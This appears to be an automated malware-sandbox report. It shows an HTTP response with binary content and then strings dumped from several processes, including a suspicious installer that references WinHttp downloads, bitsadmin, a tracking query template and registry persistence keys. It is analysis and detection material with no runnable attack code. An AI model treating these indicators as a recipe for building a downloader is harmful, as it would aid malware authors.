Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:21 GMT
Connection: close
Content-Length: 1768
...S.T '.QE9..bb,........a...Y $.4$.r!.Ss......Xd<..._&.....T.....,..LMPLpR,..>..K.. .q..r.yI}P.@i..dz..K18....&8.......@.F.wO. ..<............-)....d......u.....[.....-..RD.u..>.....X].#..2.\...y..-.=.X......Y..*2..>hD..."._?......).&ceC._ 8Uw.!......`y.X6.....*......a`..f...-.v...)X....../f.jD......6..*.:..6...F..G...D%(......qm.}.`..w.JR...j.._VB.xw..s.z.W..w....*..?1./.jRp..$.g..7.Xv)...........M.....b....*X.heboL...{.s>.t ........{.x......<..Q.....[...sb.=..JKx..2X.@O.$.d.Y .j{.%A.[.=..g..|N#....%!...^..q)......}^.....7dN`o..{;.A..O......g..%...r.].Dy.j.. t . p.x.|R.[#...$...G. .?..H....8..... ..wc......W..hv:z...[...[...8....V.....v.)..j.......Do".fq"..@..jI..........]...t.;.3.8gt\....F.$...A}.ex...:...,4..n%kF;.';3.../.......H.J.,|.r..I..$%M..C...l..Y\.........Z.......9r..=A....X..........2[9 cJ$....D3b.|....h. *......eh.........gR........ ..!..a.\y]..w..1.|....[..........8.Y.XT/.i.&.2i...??>.....EZS."........*#x..C...,T.......#%.js,.1..tT#../...htZ9%.......V.v.ri..n.\A.......g. .\}..........lI..j.......six}.^ .J]9.......t..Y.s..n.B..am%.Vkv...H4./&.4.E..C.w.?i..^&........g2d:..'.&Gc...m.i...O..<...}4VeJ..2..Y......B..... .|.Y.r.?R.c.. ..B....p,....rz..Q....O.h....c........?.yj.I..9..D.#....q.c.....8.....f..f.e.....M...gc.,..i:*....I=&6.o....*..l....hN.......8,(...9.4...O.u../.{..N.~..k.H.OX^......hYm..]c..#....V..1..d.m.Q....I.LX....].T.J.~7."....6aA............itU.4B.G....Sz.~.c.A...59.....e...g{...%...T .N.@...>.6z.lR....%.......p..7s..Z.D>....D"Q.Z..S./a..c.`#-.......
<<< skipped >>>
Map
The Application connects to the servers at the folowing location(s):
Strings from Dumps
iexplore.exe_804:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
>.uzf
>.uzf
.us;}
.us;}
IEFRAME.dll
IEFRAME.dll
MLANG.dll
MLANG.dll
iertutil.dll
iertutil.dll
urlmon.dll
urlmon.dll
ole32.dll
ole32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
GetWindowsDirectoryW
GetWindowsDirectoryW
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
UrlApplySchemeW
UrlApplySchemeW
PathIsURLW
PathIsURLW
UrlCanonicalizeW
UrlCanonicalizeW
UrlCreateFromPathW
UrlCreateFromPathW
iexplore.pdb
iexplore.pdb
KEYW
KEYW
KEYWh
KEYWh
KEYWD
KEYWD
.ENNNG.
.ENNNG.
a.ry.v
a.ry.v
l.igM4
l.igM4
?1%SGf
?1%SGf
xh.JW^
xh.JW^
.97777"7" " " !
.97777"7" " " !
3.... ))
3.... ))
8888888888888
8888888888888
8888888888
8888888888
.lPV)
.lPV)
úW1
úW1
.ApX/
.ApX/
H.ZAf
H.ZAf
ð[U
ð[U
%s!FK
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
888777777
Y.hilkRROMLK=C,
Y.hilkRROMLK=C,
..(((($$
..(((($$
3...((((%
3...((((%
3....(.''$
3....(.''$
3.2...((((%
3.2...((((%
33.2....(,'
33.2....(,'
55323222...
55323222...
(%&'00443445?
(%&'00443445?
00.,,,4(
00.,,,4(
000.,,9(
000.,,9(
0020..9(
0020..9(
003200;(
003200;(
(#'( (''''!'!
(#'( (''''!'!
Microsoft.InternetExplorer.Default
Microsoft.InternetExplorer.Default
user32.dll
user32.dll
Kernel32.DLL
Kernel32.DLL
xfire.exe
xfire.exe
wlmail.exe
wlmail.exe
winamp.exe
winamp.exe
waol.exe
waol.exe
sidebar.exe
sidebar.exe
psocdesigner.exe
psocdesigner.exe
np.exe
np.exe
netscape.exe
netscape.exe
netcaptor.exe
netcaptor.exe
neoplanet.exe
neoplanet.exe
msn.exe
msn.exe
mshtmpad.exe
mshtmpad.exe
mshta.exe
mshta.exe
loader42.exe
loader42.exe
infopath.exe
infopath.exe
iexplore.exe
iexplore.exe
iepreview.exe
iepreview.exe
groove.exe
groove.exe
explorer.exe
explorer.exe
dreamweaver.exe
dreamweaver.exe
contribute.exe
contribute.exe
aol.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
"%s" %s
Kernel32.dll
Kernel32.dll
\AppPatch\sysmain.sdb
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
kernel32.dll
{00000000-0000-0000-0000-000000000000}
{00000000-0000-0000-0000-000000000000}
\\?\Volume
\\?\Volume
shell:%s
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Frame_URLEntered
Imaging_CreateWebPagePreview
Imaging_CreateWebPagePreview
WS_ExecuteQuery
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
IEXPLORE.EXE
Windows
Windows
9.00.8112.16421
9.00.8112.16421
iexplore.exe_568:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
>.uzf
>.uzf
.us;}
.us;}
IEFRAME.dll
IEFRAME.dll
MLANG.dll
MLANG.dll
iertutil.dll
iertutil.dll
urlmon.dll
urlmon.dll
ole32.dll
ole32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
GetWindowsDirectoryW
GetWindowsDirectoryW
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
UrlApplySchemeW
UrlApplySchemeW
PathIsURLW
PathIsURLW
UrlCanonicalizeW
UrlCanonicalizeW
UrlCreateFromPathW
UrlCreateFromPathW
iexplore.pdb
iexplore.pdb
KEYW
KEYW
KEYWh
KEYWh
KEYWD
KEYWD
.ENNNG.
.ENNNG.
a.ry.v
a.ry.v
l.igM4
l.igM4
?1%SGf
?1%SGf
xh.JW^
xh.JW^
.97777"7" " " !
.97777"7" " " !
3.... ))
3.... ))
8888888888888
8888888888888
8888888888
8888888888
.lPV)
.lPV)
úW1
úW1
.ApX/
.ApX/
H.ZAf
H.ZAf
ð[U
ð[U
%s!FK
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
888777777
Y.hilkRROMLK=C,
Y.hilkRROMLK=C,
..(((($$
..(((($$
3...((((%
3...((((%
3....(.''$
3....(.''$
3.2...((((%
3.2...((((%
33.2....(,'
33.2....(,'
55323222...
55323222...
(%&'00443445?
(%&'00443445?
00.,,,4(
00.,,,4(
000.,,9(
000.,,9(
0020..9(
0020..9(
003200;(
003200;(
(#'( (''''!'!
(#'( (''''!'!
Microsoft.InternetExplorer.Default
Microsoft.InternetExplorer.Default
user32.dll
user32.dll
Kernel32.DLL
Kernel32.DLL
xfire.exe
xfire.exe
wlmail.exe
wlmail.exe
winamp.exe
winamp.exe
waol.exe
waol.exe
sidebar.exe
sidebar.exe
psocdesigner.exe
psocdesigner.exe
np.exe
np.exe
netscape.exe
netscape.exe
netcaptor.exe
netcaptor.exe
neoplanet.exe
neoplanet.exe
msn.exe
msn.exe
mshtmpad.exe
mshtmpad.exe
mshta.exe
mshta.exe
loader42.exe
loader42.exe
infopath.exe
infopath.exe
iexplore.exe
iexplore.exe
iepreview.exe
iepreview.exe
groove.exe
groove.exe
explorer.exe
explorer.exe
dreamweaver.exe
dreamweaver.exe
contribute.exe
contribute.exe
aol.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}
{28fb17e0-d393-439d-9a21-9474a070473a}
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}
"%s" %s
"%s" %s
Kernel32.dll
Kernel32.dll
\AppPatch\sysmain.sdb
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
kernel32.dll
{00000000-0000-0000-0000-000000000000}
{00000000-0000-0000-0000-000000000000}
\\?\Volume
\\?\Volume
shell:%s
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Frame_URLEntered
Imaging_CreateWebPagePreview
Imaging_CreateWebPagePreview
WS_ExecuteQuery
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
IEXPLORE.EXE
Windows
Windows
9.00.8112.16421
9.00.8112.16421
SearchProtocolHost.exe_2268:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
MSSHooks.dll
MSSHooks.dll
IMM32.dll
IMM32.dll
SHLWAPI.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSLogin
SrchDSSPortManager
SrchDSSPortManager
SrchPHHttp
SrchPHHttp
SrchIndexerQuery
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerClient
SrchIndexerSchema
SrchIndexerSchema
Msidle.dll
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
0xx=
0xx=
%s(%d)
%s(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%s"
tagname="%s"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%s"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
SHELL32.dll
PROPSYS.dll
PROPSYS.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
SearchProtocolHost.pdb
2 2(20282|2
2 2(20282|2
4%5S5
4%5S5
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
https
https
kernel32.dll
kernel32.dll
msTracer.dll
msTracer.dll
msfte.dll
msfte.dll
lX-X-X-XX-XXXXXX
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
tquery.dll
tquery.dll
%s\%s
%s\%s
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
0xx%p%S%d
0xx%p%S%d
advapi32.dll
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
%S(%d)
%S(%d)
tagname="%S"
tagname="%S"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
SearchProtocolHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610
SearchFilterHost.exe_2952:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
ADVAPI32.dll
ADVAPI32.dll
ntdll.DLL
ntdll.DLL
KERNEL32.dll
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TQUERY.DLL
TQUERY.DLL
IMM32.dll
IMM32.dll
MSSHooks.dll
MSSHooks.dll
mscoree.dll
mscoree.dll
SHLWAPI.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyW
RegDeleteKeyExW
RegDeleteKeyExW
8%uiP
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ReportEventW
ReportEventW
_amsg_exit
_amsg_exit
SearchFilterHost.pdb
SearchFilterHost.pdb
version="5.1.0.0"
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
name="Microsoft.Windows.Search.MSSFH"
3 3(30383|3
3 3(30383|3
kernel32.dll
kernel32.dll
Software\Microsoft\Windows Search
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
Windows Search Service
Windows Search Service
tquery.dll
tquery.dll
advapi32.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
0xx%p%S%d
0xx%p%S%d
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
Software\Microsoft\Windows Search\Tracing\EventThrottleState
0xx=
0xx=
%S(%d)
%S(%d)
tid="0x%x"
tid="0x%x"
pid="0x%x"
pid="0x%x"
tagname="%S"
tagname="%S"
tagid="0x%x"
tagid="0x%x"
el="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
time="d/d/d d:d:d.d"
logname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s.mui
.\%s\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s\%s.mui
%s\%s
%s\%s
winhttp.dll
winhttp.dll
Microsoft Windows Search Filter Host
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
SearchFilterHost.exe
Windows
Windows
7.00.7601.17610
7.00.7601.17610
Setup__2140_il2.exe_3512:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
j5SSh
j5SSh
8%uEP3
8%uEP3
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
WinHttpSetStatusCallback
WinHttpSetStatusCallback
fWIzyZ3CtqkwSGU6ncTUrL4WX1Iry5L3vqQTHEYD6bbBi5cnf1AG67zUnIwnb0UL86vGgIM5aFAV5qjUlos5fl0Ph5r6qKkUU3Auh5vnragKHGQ6w5/huucMU2Ury97mtr0dTz9A
fWIzyZ3CtqkwSGU6ncTUrL4WX1Iry5L3vqQTHEYD6bbBi5cnf1AG67zUnIwnb0UL86vGgIM5aFAV5qjUlos5fl0Ph5r6qKkUU3Auh5vnragKHGQ6w5/huucMU2Ury97mtr0dTz9A
Failed to get the Temp folder: %d
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Send progress update request %s
Progress Request for '%S' return %s
Progress Request for '%S' return %s
%c%c%c%c
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
VERSION.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegOpenKeyExW
RegCreateKeyExW
RegCreateKeyExW
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
Secur32.dll
Secur32.dll
WinHttpCloseHandle
WinHttpCloseHandle
WinHttpOpen
WinHttpOpen
WinHttpSetOption
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpConnect
WinHttpOpenRequest
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReadData
WinHttpReceiveResponse
WinHttpReceiveResponse
WINHTTP.dll
WINHTTP.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
.?AVAsyncWinHttp@@
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
noesis.beryline.1 = s 'Inst Class'
noesis.beryline.1 = s 'Inst Class'
CLSID = s '{ca90508a-de03-464c-b43f-2ab03068b458}'
CLSID = s '{ca90508a-de03-464c-b43f-2ab03068b458}'
noesis.beryline = s 'Inst Class'
noesis.beryline = s 'Inst Class'
CurVer = s 'noesis.beryline.1'
CurVer = s 'noesis.beryline.1'
ForceRemove {ca90508a-de03-464c-b43f-2ab03068b458} = s 'Inst Class'
ForceRemove {ca90508a-de03-464c-b43f-2ab03068b458} = s 'Inst Class'
ProgID = s 'noesis.beryline.1'
ProgID = s 'noesis.beryline.1'
VersionIndependentProgID = s 'noesis.beryline'
VersionIndependentProgID = s 'noesis.beryline'
val ServerExecutable = s '%MODULE_RAW%'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}'
TypeLib = s '{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}'
.sssh
.sssh
REÚ
REÚ
\.crr
\.crr
s1f-'
s1f-'
.DC l
.DC l
tweb
tweb
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
stdole2.tlbWWW(
msgWd
msgWd
keyNameW
keyNameW
urlW
urlW
url2d
url2d
YtcmdLineW
YtcmdLineW
P%CreateIconWW
P%CreateIconWW
iconUrlW
iconUrlW
regKeyWW
regKeyWW
CheckRegKeyW
CheckRegKeyW
keyWd
keyWd
W.launchCommandLineWWW
W.launchCommandLineWWW
~cmdW
~cmdW
WDIsShortNameInstalledd
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Sun Oct 16 03:45:47 2016
Created by MIDL version 7.00.0555 at Sun Oct 16 03:45:47 2016
: :):0:`:
: :):0:`:
3!3@3^3{3
3!3@3^3{3
3"3&3*3.395
3"3&3*3.395
1%2S2v2
1%2S2v2
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
wKERNEL32.DLL
wKERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
WUSER32.DLL
WUSER32.DLL
Winhttp.dll
Winhttp.dll
shlwapi.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
appimageurl
appimageurl
cmdl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\bitsadmin.exe
\Support Tools\bitsadmin.exe
\Support Tools\bitsadmin.exe
:?*\"'/.
:?*\"'/.
dream.capture
dream.capture
%sami%s%d%d.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
/retrynav %d
Advapi32.dll
Advapi32.dll
shell32.dll
shell32.dll
